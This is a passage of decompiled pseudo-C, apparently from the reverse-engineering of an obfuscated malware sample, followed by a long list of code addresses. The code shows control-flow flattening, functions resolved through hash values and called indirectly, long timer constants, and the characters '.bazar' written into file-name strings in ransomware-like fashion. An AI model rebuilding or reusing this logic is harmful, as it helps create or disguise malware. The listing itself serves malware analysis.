								if(_t503 == 0x873106d2) {
									_v536 = _v584;
									_t724 =  *((intOrPtr*)(_v904 + 0x230));
									_t640 = _v704;
									_v528 = _t640;
									_t725 = _v536;
									_t707 = _v528;
									E00B76118(_t503,  *((intOrPtr*)(_v904 + 0x228)), _t598, _t707,  *((intOrPtr*)(_v904 + 0x230)), _v536);
									_t368 =  !=  ? 0x12c2785 : 0xc6fd976d;
								} else {
									_t368 = _t503;
									if(_t503 == 0x87afab9e) {
										_t368 = _v620;
									}
								}
							}
						}
					}
					continue;
					L10:
					if(_t503 > 0x514370c1) {
						if(_t503 <= 0x6745e6b6) {
							if(_t503 > 0x574d588e) {
								if(_t503 <= 0x5d3f2d88) {
									if(_t503 == 0x574d588f) {
										 *_v816 = 0x1b7740;
										_t368 = 0xc3c975df;
									} else {
										_t368 = _t503;
										if(_t503 == 0x5903be2d) {
											_t721 = _v904;
											 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t721 + 0x220)) + _v832 * 8)) + _v632 * 2)) = 0;
											_t640 = _v832;
											_v772 =  *_t640;
											_t707 = _v832;
											 *_t707 = _v772 + 1;
											_t368 =  <  ? 0x52e2fcd6 : 0x49d13f87;
										}
									}
									continue;
								}
								if(_t503 == 0x5d3f2d89) {
									goto L143;
								} else {
									if(_t503 == 0x5ffd86ff) {
										_t640 =  *((intOrPtr*)( *((intOrPtr*)(_v904 + 0x220)) + _v832 * 8));
										_t707 = _v632;
										_t596 = _v890 & 0x0000ffff;
										 *(_t640 + _t707 * 2) = _t596;
										_v796 = _v764 + 1;
										_t368 = 0x8c01f6ea;
									} else {
										_t368 = _t503;
										if(_t503 == 0x62146214) {
											_v872 = _v800;
											_t368 =  <  ? 0xd97c734e : 0xad742835;
										}
									}
									continue;
								}
							}
							if(_t503 <= 0x53bce5ec) {
								if(_t503 == 0x514370c2) {
									_t368 =  ==  ? 0xc1df8fb5 : 0x52e2fcd6;
									continue;
								}
								_t368 = _t503;
								if(_t503 != 0x52e2fcd6) {
									continue;
								}
								L201:
								r12b = 1;
								_t368 = 0x53bce5ed;
								continue;
							}
							if(_t503 == 0x53bce5ed) {
								r12b = r12b & 0x00000001;
								return r12d;
							} else {
								_t368 = _t503;
								if(_t503 == 0x564692ca) {
									_t640 = _v860;
									_t707 = _v736;
									 *((char*)(_t723 + _t640 + 0x5d)) =  *((intOrPtr*)(_t707 + _t640));
									_v720 = _t640;
									_t368 = 0x844b3ff6;
								}
								continue;
							}
						}
						if(_t503 <= 0x727b8f29) {
							if(_t503 <= 0x6e65093e) {
								if(_t503 == 0x6745e6b7) {
									_t640 = _v696;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E00B7FAD7(1, _t600, _t640, _t707);
									 *_t640();
									goto L201;
								}
								_t368 = _t503;
								if(_t503 != 0x6c161dc6) {
									continue;
								}
								_t640 = _v816;
								L142:
								 *_t640 = 0xea60;
								goto L143;
							}
							if(_t503 == 0x6e65093f) {
								_v864 =  *_v816 +  *_v816;
								_t640 = _v816;
								 *_t640 = _v864;
								_t368 =  >  ? 0x9213403 : 0xc3c975df;
								continue;
							}
							if(_t503 == 0x6ecf8e8e) {
								_v873 = 0;
								_t368 = 0x62146214;
								_v800 = 0;
								continue;
							}
							_t368 = _t503;
							if(_t503 != 0x6f81883a) {
								continue;
							} else {
								_t707 = _v560;
								 *_t707 = _v780 + 1;
								_t640 = _v696;
								goto L142;
							}
						}
						if(_t503 > 0x7cdb6e3c) {
							if(_t503 == 0x7cdb6e3d) {
								E00B7CC2E(_t640, _v520);
								E00B7CC2E(_t640, _v672);
								_t707 = _v736;
								E00B7CC2E(_t640, _t707);
								_t640 = _v664;
								_t368 = 0x34ddbdbe;
							} else {
								if(_t503 == 0x7f365e09) {
									_v848 = _t368;
									_v512 = (_v848 << 2) + _v480;
									_t640 = _v512;
									_t368 =  ==  ? 0x1b18ea96 : 0x8729393;
								} else {
									_t368 = _t503;
									if(_t503 == 0x7ff9f897) {
										_t368 = r13d;
									}
								}
							}
							continue;
						}
						if(_t503 == 0x727b8f2a) {
							_t368 =  ==  ? 0x6745e6b7 : 0xa32a0313;
							continue;
						}
						if(_t503 == 0x74e12cd6) {
							goto L38;
						}
						_t368 = _t503;
						if(_t503 != 0x75019ba8) {
							continue;
						} else {
							goto L38;
						}
					}
					if(_t503 > 0x21790be6) {
						if(_t503 <= 0x2fe22761) {
							if(_t503 <= 0x280f3888) {
								if(_t503 == 0x21790be7) {
									 *_v840 = 1;
									_t640 = _v680;
									 *_t640 = 0;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E00B7FAD7(1, _t600, _t640, _t707);
									 *_t640();
									 *((intOrPtr*)(_v904 + 0x250)) = 0x1b7740;
									_t368 = 0x280f3889;
								} else {
									_t368 = _t503;
									if(_t503 == 0x23069f92) {
										_t368 = 0x53bce5ed;
										r12d = 0;
									}
								}
								continue;
							}
							if(_t503 == 0x280f3889) {
								_t640 = _v688;
								_t707 = _v688;
								 *_t707 =  *_t640 + 1;
								goto L178;
							} else {
								if(_t503 == 0x2b3e96a7) {
									_t368 = 0xc2927316;
								} else {
									_t368 = _t503;
									if(_t503 == 0x2ccb8bda) {
										E00B7CDB9(0x4380, _t640);
										_t707 = _v888;
										 *_t707 = _t640;
										_t368 = 0x4a668043;
										_v804 = 0;
									}
								}
								continue;
							}
						}
						if(_t503 > 0x4721b861) {
							_t368 = r15d;
							if(_t503 != 0x4721b862) {
								if(_t503 == 0x49d13f87) {
									_t640 = _v832;
									 *_t640 = _v772;
									_t368 = 0x52e2fcd6;
								} else {
									_t368 = _t503;
									if(_t503 == 0x4a668043) {
										_v856 = _v804;
										_t640 = _v648;
										_t368 =  <  ? 0xaaa69421 : 0x2b3e96a7;
									}
								}
							}
							continue;
						}
						if(_t503 == 0x2fe22762) {
							_v844 = _v792;
							_v832 = _v576;
							_t640 = _v832;
							_t368 =  <  ? 0x8efa67b7 : 0x514370c2;
							_v908 = _v907;
							continue;
						}
						if(_t503 == 0x34ddbdbe) {
							_v640 = _v584;
							_v504 = _v640;
							_t724 =  *_v592;
							_t640 = _v600;
							_t596 =  *_t640;
							_t707 = _v680;
							_t725 = _v504;
							E00B76118(_t503, _t596, _t598, _t707,  *_v592, _v504);
							_t368 =  !=  ? 0xf200fb5 : 0x21790be7;
							continue;
						}
						_t368 = _t503;
						if(_t503 != 0x4591200e) {
							continue;
						} else {
							goto L198;
						}
					}
					if(_t503 <= 0xaa86689) {
						if(_t503 <= 0x782ba56) {
							if(_t503 == 0x12c2785) {
								_t640 = _v536;
								_t707 = _v904;
								 *_t707 = _t640;
								goto L198;
							}
							_t368 = _t503;
							if(_t503 == 0x73cf00c) {
								_v744 = _v704;
								_t640 = _v744;
								_v776 =  *_t640;
								_t707 = _v576;
								_t368 =  <  ? 0xc4b668eb : 0xb4b38c1f;
							}
						} else {
							if(_t503 == 0x782ba57) {
								_v768 = _v788;
								_t640 =  *((intOrPtr*)( *((intOrPtr*)(_v904 + 0x220)) + _v844 * 8));
								_v496 = _v768;
								_t707 = _v496;
								_v892 =  *(_t640 + _t707 * 2) & 0x0000ffff;
								_t368 =  ==  ? 0xe87f8cad : 0xfa2adb82;
								_v868 = 1;
							} else {
								if(_t503 == 0x8729393) {
									_t417 = _v848;
									_t532 = _t417 + 0x3f1;
									_t707 = _t532 * 0xf2b9d649 >> 0x20;
									_t596 = _t532 + _t417 + 0x3f1 >> 0x1f;
									_v728 = _t640;
									_t368 = 0x7f365e09;
								} else {
									_t368 = _t503;
									if(_t503 == 0x9213403) {
										_t368 =  <  ? 0x574d588f : 0xc3c975df;
									}
								}
							}
						}
					} else {
						if(_t503 > 0x1b18ea95) {
							if(_t503 == 0x1b18ea96) {
								_t707 =  *((intOrPtr*)( *_v888 + _t706 * 8));
								_t721 = _v672;
								r8d = _v848;
								E00B75EF8( *_v888, _t707, _t721, _t724, _t726);
								 *_v512 = 1;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x18)) = 0x2e;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x1a)) = 0x62;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x1c)) = 0x61;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x1e)) = 0x7a;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x20)) = 0x61;
								_t640 =  *((intOrPtr*)( *_v888 + _t706 * 8));
								 *((short*)(_t640 + 0x22)) = 0x72;
								_v808 = _v852 + 1;
								_t368 = 0xea11413;
							} else {
								if(_t503 == 0x1bd2d9df) {
									_v792 = _v844 + 1;
									_v907 = _v909;
									_t368 = 0x2fe22762;
								} else {
									_t368 = _t503;
									if(_t503 == 0x1cfee6ca) {
										_t368 = _v612;
									}
								}
							}
						} else {
							if(_t503 == 0xaa8668a) {
								_v840 = _v608;
								_t640 = _v840;
								_t368 =  ==  ? 0x73cf00c : 0xd55faea2;
							} else {
								if(_t503 == 0xea11413) {
									_v852 = _v808;
									_t640 = _v648;
									_t368 =  <  ? 0xad7f3cd0 : 0x7cdb6e3d;
								} else {
									_t368 = _t503;
									if(_t503 == 0xf200fb5) {
										_t640 = _v504;
										_t707 = _v904;
										 *_t707 = _t640;
										_t368 = 0x2fe22762;
										_v792 = 0;
									}
								}
							}
						}
					}
				}
			}




































































































                                                                                                                                                        0x00b76537
                                                                                                                                                        0x00b76537
                                                                                                                                                        0x00b76537
                                                                                                                                                        0x00b76537
                                                                                                                                                        0x00b76543
                                                                                                                                                        0x00b7654a
                                                                                                                                                        0x00b76552
                                                                                                                                                        0x00b7655b
                                                                                                                                                        0x00b7656a
                                                                                                                                                        0x00b76576
                                                                                                                                                        0x00b7658b
                                                                                                                                                        0x00b76596
                                                                                                                                                        0x00b7659c
                                                                                                                                                        0x00b765a0
                                                                                                                                                        0x00b765af
                                                                                                                                                        0x00b765bd
                                                                                                                                                        0x00b765c0
                                                                                                                                                        0x00b765cf
                                                                                                                                                        0x00b765d2
                                                                                                                                                        0x00b765e0
                                                                                                                                                        0x00b765f4
                                                                                                                                                        0x00b765f7
                                                                                                                                                        0x00b76603
                                                                                                                                                        0x00b76609
                                                                                                                                                        0x00b76612
                                                                                                                                                        0x00b76618
                                                                                                                                                        0x00b76623
                                                                                                                                                        0x00b76632
                                                                                                                                                        0x00b76641
                                                                                                                                                        0x00b76650
                                                                                                                                                        0x00b7665c
                                                                                                                                                        0x00b7666b
                                                                                                                                                        0x00b76673
                                                                                                                                                        0x00b76678
                                                                                                                                                        0x00b7667f
                                                                                                                                                        0x00b76687
                                                                                                                                                        0x00b7668b
                                                                                                                                                        0x00b76693
                                                                                                                                                        0x00b7669b
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00b766a9
                                                                                                                                                        0x00b766af
                                                                                                                                                        0x00b7678b
                                                                                                                                                        0x00b768e2
                                                                                                                                                        0x00b76bb7
                                                                                                                                                        0x00b77145
                                                                                                                                                        0x00b77b08
                                                                                                                                                        0x00b7714b
                                                                                                                                                        0x00b7714b
                                                                                                                                                        0x00b77153
                                                                                                                                                        0x00b7716d
                                                                                                                                                        0x00b77172
                                                                                                                                                        0x00b7717f
                                                                                                                                                        0x00b77186
                                                                                                                                                        0x00b77186
                                                                                                                                                        0x00b77153
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b76bc3
                                                                                                                                                        0x00b77689
                                                                                                                                                        0x00b7768e
                                                                                                                                                        0x00b77696
                                                                                                                                                        0x00b7769c
                                                                                                                                                        0x00b7769f
                                                                                                                                                        0x00b776aa
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b76bcf
                                                                                                                                                        0x00b776b8
                                                                                                                                                        0x00b776d1
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b76bd5
                                                                                                                                                        0x00b76bdd
                                                                                                                                                        0x00b76be3
                                                                                                                                                        0x00b76beb
                                                                                                                                                        0x00b76bf0
                                                                                                                                                        0x00b770d8
                                                                                                                                                        0x00b770d8
                                                                                                                                                        0x00b770dd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b768e8
                                                                                                                                                        0x00b768ee
                                                                                                                                                        0x00b76f9b
                                                                                                                                                        0x00b7795b
                                                                                                                                                        0x00b77965
                                                                                                                                                        0x00b77968
                                                                                                                                                        0x00b7796d
                                                                                                                                                        0x00b77975
                                                                                                                                                        0x00b77987
                                                                                                                                                        0x00b76fa1
                                                                                                                                                        0x00b76fa7
                                                                                                                                                        0x00b77994
                                                                                                                                                        0x00b7799c
                                                                                                                                                        0x00b779b2
                                                                                                                                                        0x00b76fad
                                                                                                                                                        0x00b76fad
                                                                                                                                                        0x00b76fb5
                                                                                                                                                        0x00b76fbb
                                                                                                                                                        0x00b76fbb
                                                                                                                                                        0x00b76fb5
                                                                                                                                                        0x00b76fa7
                                                                                                                                                        0x00b768f4
                                                                                                                                                        0x00b768fa
                                                                                                                                                        0x00b773f4
                                                                                                                                                        0x00b773f9
                                                                                                                                                        0x00b773ff
                                                                                                                                                        0x00b77405
                                                                                                                                                        0x00b7740e
                                                                                                                                                        0x00b77416
                                                                                                                                                        0x00b77418
                                                                                                                                                        0x00b77420
                                                                                                                                                        0x00b77423
                                                                                                                                                        0x00b76900
                                                                                                                                                        0x00b76906
                                                                                                                                                        0x00b7742d
                                                                                                                                                        0x00b77442
                                                                                                                                                        0x00b7690c
                                                                                                                                                        0x00b7690c
                                                                                                                                                        0x00b76914
                                                                                                                                                        0x00b76922
                                                                                                                                                        0x00b7692f
                                                                                                                                                        0x00b76939
                                                                                                                                                        0x00b7693b
                                                                                                                                                        0x00b76951
                                                                                                                                                        0x00b76951
                                                                                                                                                        0x00b76914
                                                                                                                                                        0x00b76906
                                                                                                                                                        0x00b768fa
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b766a7
                                                                                                                                                        0x00b766a0
                                                                                                                                                        0x00b768e2
                                                                                                                                                        0x00b76797
                                                                                                                                                        0x00b76a48
                                                                                                                                                        0x00b77079
                                                                                                                                                        0x00b77a30
                                                                                                                                                        0x00b77a35
                                                                                                                                                        0x00b77a3f
                                                                                                                                                        0x00b77a55
                                                                                                                                                        0x00b77a57
                                                                                                                                                        0x00b77a5f
                                                                                                                                                        0x00b7707f
                                                                                                                                                        0x00b7707f
                                                                                                                                                        0x00b77087
                                                                                                                                                        0x00b77095
                                                                                                                                                        0x00b7709b
                                                                                                                                                        0x00b770a3
                                                                                                                                                        0x00b770a6
                                                                                                                                                        0x00b770a6
                                                                                                                                                        0x00b77087
                                                                                                                                                        0x00b76a4e
                                                                                                                                                        0x00b76a54
                                                                                                                                                        0x00b77581
                                                                                                                                                        0x00b7758f
                                                                                                                                                        0x00b77595
                                                                                                                                                        0x00b775a2
                                                                                                                                                        0x00b775a7
                                                                                                                                                        0x00b775ad
                                                                                                                                                        0x00b775b3
                                                                                                                                                        0x00b775ba
                                                                                                                                                        0x00b775bc
                                                                                                                                                        0x00b76a5a
                                                                                                                                                        0x00b76a60
                                                                                                                                                        0x00b775ce
                                                                                                                                                        0x00b775d6
                                                                                                                                                        0x00b775eb
                                                                                                                                                        0x00b76a66
                                                                                                                                                        0x00b76a66
                                                                                                                                                        0x00b76a6e
                                                                                                                                                        0x00b76a86
                                                                                                                                                        0x00b76a8d
                                                                                                                                                        0x00b76a8d
                                                                                                                                                        0x00b76a6e
                                                                                                                                                        0x00b76a60
                                                                                                                                                        0x00b76a54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76a48
                                                                                                                                                        0x00b767a3
                                                                                                                                                        0x00b76d79
                                                                                                                                                        0x00b77846
                                                                                                                                                        0x00b7785d
                                                                                                                                                        0x00b77860
                                                                                                                                                        0x00b7786c
                                                                                                                                                        0x00b77874
                                                                                                                                                        0x00b77a23
                                                                                                                                                        0x00b77a23
                                                                                                                                                        0x00b77a28
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77a28
                                                                                                                                                        0x00b76d85
                                                                                                                                                        0x00b7787b
                                                                                                                                                        0x00b77880
                                                                                                                                                        0x00b76d8b
                                                                                                                                                        0x00b76d8b
                                                                                                                                                        0x00b76d93
                                                                                                                                                        0x00b76da1
                                                                                                                                                        0x00b76daf
                                                                                                                                                        0x00b76db5
                                                                                                                                                        0x00b76dc2
                                                                                                                                                        0x00b76dc7
                                                                                                                                                        0x00b76dcd
                                                                                                                                                        0x00b76dd3
                                                                                                                                                        0x00b76dda
                                                                                                                                                        0x00b76ddc
                                                                                                                                                        0x00b76ddc
                                                                                                                                                        0x00b76d93
                                                                                                                                                        0x00b767a9
                                                                                                                                                        0x00b767af
                                                                                                                                                        0x00b772ca
                                                                                                                                                        0x00b772d5
                                                                                                                                                        0x00b767b5
                                                                                                                                                        0x00b767bb
                                                                                                                                                        0x00b772e4
                                                                                                                                                        0x00b772e9
                                                                                                                                                        0x00b772f1
                                                                                                                                                        0x00b772f9
                                                                                                                                                        0x00b77301
                                                                                                                                                        0x00b77306
                                                                                                                                                        0x00b767c1
                                                                                                                                                        0x00b767c1
                                                                                                                                                        0x00b767c9
                                                                                                                                                        0x00b767cf
                                                                                                                                                        0x00b767e7
                                                                                                                                                        0x00b767ea
                                                                                                                                                        0x00b767c9
                                                                                                                                                        0x00b767bb
                                                                                                                                                        0x00b767af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b767a3
                                                                                                                                                        0x00b766bb
                                                                                                                                                        0x00b7683f
                                                                                                                                                        0x00b76aee
                                                                                                                                                        0x00b770ea
                                                                                                                                                        0x00b77671
                                                                                                                                                        0x00b77671
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77671
                                                                                                                                                        0x00b770f0
                                                                                                                                                        0x00b770f8
                                                                                                                                                        0x00b77107
                                                                                                                                                        0x00b7710e
                                                                                                                                                        0x00b7710e
                                                                                                                                                        0x00b76af4
                                                                                                                                                        0x00b76afa
                                                                                                                                                        0x00b77646
                                                                                                                                                        0x00b77651
                                                                                                                                                        0x00b76b00
                                                                                                                                                        0x00b76b00
                                                                                                                                                        0x00b76b09
                                                                                                                                                        0x00b76b0f
                                                                                                                                                        0x00b76b17
                                                                                                                                                        0x00b76b25
                                                                                                                                                        0x00b76b33
                                                                                                                                                        0x00b76b3b
                                                                                                                                                        0x00b76b50
                                                                                                                                                        0x00b76b50
                                                                                                                                                        0x00b76b17
                                                                                                                                                        0x00b76b09
                                                                                                                                                        0x00b76afa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76aee
                                                                                                                                                        0x00b7684b
                                                                                                                                                        0x00b76e14
                                                                                                                                                        0x00b76e1c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76e28
                                                                                                                                                        0x00b77914
                                                                                                                                                        0x00b7791e
                                                                                                                                                        0x00b77925
                                                                                                                                                        0x00b7792f
                                                                                                                                                        0x00b77936
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77936
                                                                                                                                                        0x00b76e2e
                                                                                                                                                        0x00b76e36
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76e3c
                                                                                                                                                        0x00b76e3f
                                                                                                                                                        0x00b76e45
                                                                                                                                                        0x00b76e48
                                                                                                                                                        0x00b76e4b
                                                                                                                                                        0x00b76e50
                                                                                                                                                        0x00b76e67
                                                                                                                                                        0x00b76e6f
                                                                                                                                                        0x00b76e74
                                                                                                                                                        0x00b76e7a
                                                                                                                                                        0x00b76e7d
                                                                                                                                                        0x00b76e85
                                                                                                                                                        0x00b76e90
                                                                                                                                                        0x00b76ea3
                                                                                                                                                        0x00b76ed1
                                                                                                                                                        0x00b76ed1
                                                                                                                                                        0x00b76ed9
                                                                                                                                                        0x00b76ee1
                                                                                                                                                        0x00b76ee4
                                                                                                                                                        0x00b76ef1
                                                                                                                                                        0x00b76f01
                                                                                                                                                        0x00b76f0f
                                                                                                                                                        0x00b76f14
                                                                                                                                                        0x00b76f27
                                                                                                                                                        0x00b76f2d
                                                                                                                                                        0x00b76f30
                                                                                                                                                        0x00b76f33
                                                                                                                                                        0x00b76f36
                                                                                                                                                        0x00b76f39
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76f39
                                                                                                                                                        0x00b76ea7
                                                                                                                                                        0x00b76ea7
                                                                                                                                                        0x00b76eb2
                                                                                                                                                        0x00b76ec0
                                                                                                                                                        0x00b76eca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76ea7
                                                                                                                                                        0x00b76857
                                                                                                                                                        0x00b77334
                                                                                                                                                        0x00b77349
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77349
                                                                                                                                                        0x00b76863
                                                                                                                                                        0x00b7688c
                                                                                                                                                        0x00b7688c
                                                                                                                                                        0x00b76891
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76891
                                                                                                                                                        0x00b76865
                                                                                                                                                        0x00b7686d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76873
                                                                                                                                                        0x00b7687b
                                                                                                                                                        0x00b76881
                                                                                                                                                        0x00b76889
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76889
                                                                                                                                                        0x00b7686d
                                                                                                                                                        0x00b766c7
                                                                                                                                                        0x00b766d3
                                                                                                                                                        0x00b76c54
                                                                                                                                                        0x00b77726
                                                                                                                                                        0x00b77743
                                                                                                                                                        0x00b76c5a
                                                                                                                                                        0x00b76c60
                                                                                                                                                        0x00b77753
                                                                                                                                                        0x00b7775b
                                                                                                                                                        0x00b77765
                                                                                                                                                        0x00b7776a
                                                                                                                                                        0x00b76c66
                                                                                                                                                        0x00b76c66
                                                                                                                                                        0x00b76c6e
                                                                                                                                                        0x00b76c79
                                                                                                                                                        0x00b76c7e
                                                                                                                                                        0x00b76c8b
                                                                                                                                                        0x00b76c90
                                                                                                                                                        0x00b76c98
                                                                                                                                                        0x00b76ca0
                                                                                                                                                        0x00b76ca3
                                                                                                                                                        0x00b76cad
                                                                                                                                                        0x00b76cb3
                                                                                                                                                        0x00b76cb9
                                                                                                                                                        0x00b76cbe
                                                                                                                                                        0x00b76cc3
                                                                                                                                                        0x00b76cd2
                                                                                                                                                        0x00b76cd5
                                                                                                                                                        0x00b76cd8
                                                                                                                                                        0x00b76cdf
                                                                                                                                                        0x00b76cef
                                                                                                                                                        0x00b76cf7
                                                                                                                                                        0x00b76cfb
                                                                                                                                                        0x00b76d08
                                                                                                                                                        0x00b76d18
                                                                                                                                                        0x00b76d22
                                                                                                                                                        0x00b76d2a
                                                                                                                                                        0x00b76d31
                                                                                                                                                        0x00b76d37
                                                                                                                                                        0x00b76d37
                                                                                                                                                        0x00b76c6e
                                                                                                                                                        0x00b76c60
                                                                                                                                                        0x00b766d9
                                                                                                                                                        0x00b766df
                                                                                                                                                        0x00b77215
                                                                                                                                                        0x00b77224
                                                                                                                                                        0x00b7722c
                                                                                                                                                        0x00b77234
                                                                                                                                                        0x00b77240
                                                                                                                                                        0x00b77255
                                                                                                                                                        0x00b766e5
                                                                                                                                                        0x00b766eb
                                                                                                                                                        0x00b7725d
                                                                                                                                                        0x00b77262
                                                                                                                                                        0x00b766f1
                                                                                                                                                        0x00b766f1
                                                                                                                                                        0x00b766f9
                                                                                                                                                        0x00b766fb
                                                                                                                                                        0x00b76703
                                                                                                                                                        0x00b76703
                                                                                                                                                        0x00b766f9
                                                                                                                                                        0x00b766eb
                                                                                                                                                        0x00b766df
                                                                                                                                                        0x00b769b7
                                                                                                                                                        0x00b769bd
                                                                                                                                                        0x00b76fec
                                                                                                                                                        0x00b779de
                                                                                                                                                        0x00b779f0
                                                                                                                                                        0x00b77a0b
                                                                                                                                                        0x00b76ff2
                                                                                                                                                        0x00b76ff2
                                                                                                                                                        0x00b76ffa
                                                                                                                                                        0x00b77000
                                                                                                                                                        0x00b7700b
                                                                                                                                                        0x00b7700b
                                                                                                                                                        0x00b76ffa
                                                                                                                                                        0x00b769c3
                                                                                                                                                        0x00b769c9
                                                                                                                                                        0x00b7744a
                                                                                                                                                        0x00b77452
                                                                                                                                                        0x00b77467
                                                                                                                                                        0x00b769cf
                                                                                                                                                        0x00b769d5
                                                                                                                                                        0x00b77477
                                                                                                                                                        0x00b77484
                                                                                                                                                        0x00b77491
                                                                                                                                                        0x00b77499
                                                                                                                                                        0x00b774a1
                                                                                                                                                        0x00b774a9
                                                                                                                                                        0x00b774b1
                                                                                                                                                        0x00b774c2
                                                                                                                                                        0x00b769db
                                                                                                                                                        0x00b769db
                                                                                                                                                        0x00b769e3
                                                                                                                                                        0x00b769e9
                                                                                                                                                        0x00b769e9
                                                                                                                                                        0x00b769e3
                                                                                                                                                        0x00b769d5
                                                                                                                                                        0x00b769c9
                                                                                                                                                        0x00b769bd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7670a
                                                                                                                                                        0x00b76710
                                                                                                                                                        0x00b767f7
                                                                                                                                                        0x00b7695f
                                                                                                                                                        0x00b76bfe
                                                                                                                                                        0x00b77196
                                                                                                                                                        0x00b77b18
                                                                                                                                                        0x00b77b1e
                                                                                                                                                        0x00b7719c
                                                                                                                                                        0x00b7719c
                                                                                                                                                        0x00b771a4
                                                                                                                                                        0x00b771aa
                                                                                                                                                        0x00b771cc
                                                                                                                                                        0x00b771d2
                                                                                                                                                        0x00b771dc
                                                                                                                                                        0x00b771ec
                                                                                                                                                        0x00b771f4
                                                                                                                                                        0x00b77206
                                                                                                                                                        0x00b77206
                                                                                                                                                        0x00b771a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77196
                                                                                                                                                        0x00b76c0a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76c10
                                                                                                                                                        0x00b76c16
                                                                                                                                                        0x00b776ef
                                                                                                                                                        0x00b776f3
                                                                                                                                                        0x00b776fb
                                                                                                                                                        0x00b77700
                                                                                                                                                        0x00b7770d
                                                                                                                                                        0x00b77714
                                                                                                                                                        0x00b76c1c
                                                                                                                                                        0x00b76c1c
                                                                                                                                                        0x00b76c24
                                                                                                                                                        0x00b76c31
                                                                                                                                                        0x00b76c46
                                                                                                                                                        0x00b76c46
                                                                                                                                                        0x00b76c24
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76c16
                                                                                                                                                        0x00b76c0a
                                                                                                                                                        0x00b7696b
                                                                                                                                                        0x00b76fcd
                                                                                                                                                        0x00b779ce
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b779ce
                                                                                                                                                        0x00b76fd3
                                                                                                                                                        0x00b76fdb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77a8f
                                                                                                                                                        0x00b77a8f
                                                                                                                                                        0x00b77a92
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77a92
                                                                                                                                                        0x00b76977
                                                                                                                                                        0x00b77b28
                                                                                                                                                        0x00b77b42
                                                                                                                                                        0x00b7697d
                                                                                                                                                        0x00b7697d
                                                                                                                                                        0x00b76985
                                                                                                                                                        0x00b7698b
                                                                                                                                                        0x00b76990
                                                                                                                                                        0x00b7699b
                                                                                                                                                        0x00b769a5
                                                                                                                                                        0x00b769ad
                                                                                                                                                        0x00b769ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76985
                                                                                                                                                        0x00b76977
                                                                                                                                                        0x00b76803
                                                                                                                                                        0x00b76a9c
                                                                                                                                                        0x00b770b6
                                                                                                                                                        0x00b77a69
                                                                                                                                                        0x00b77a75
                                                                                                                                                        0x00b77a7a
                                                                                                                                                        0x00b77a80
                                                                                                                                                        0x00b77a86
                                                                                                                                                        0x00b77a8d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77a8d
                                                                                                                                                        0x00b770bc
                                                                                                                                                        0x00b770c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b770ca
                                                                                                                                                        0x00b770d2
                                                                                                                                                        0x00b770d2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b770d2
                                                                                                                                                        0x00b76aa8
                                                                                                                                                        0x00b775ff
                                                                                                                                                        0x00b77603
                                                                                                                                                        0x00b7760f
                                                                                                                                                        0x00b77624
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77624
                                                                                                                                                        0x00b76ab4
                                                                                                                                                        0x00b7762c
                                                                                                                                                        0x00b77631
                                                                                                                                                        0x00b77636
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77636
                                                                                                                                                        0x00b76aba
                                                                                                                                                        0x00b76ac2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76ac8
                                                                                                                                                        0x00b76ad1
                                                                                                                                                        0x00b76ad9
                                                                                                                                                        0x00b76adb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76adb
